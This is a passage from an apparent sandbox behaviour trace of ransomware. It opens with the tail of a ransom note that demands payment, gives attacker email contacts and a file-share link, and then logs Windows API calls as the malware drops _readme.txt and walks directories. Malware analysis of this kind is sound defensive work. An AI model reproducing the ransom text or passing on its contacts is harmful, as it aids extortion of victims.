files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.600] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.600] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.600] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.600] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.601] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.601] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.601] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: 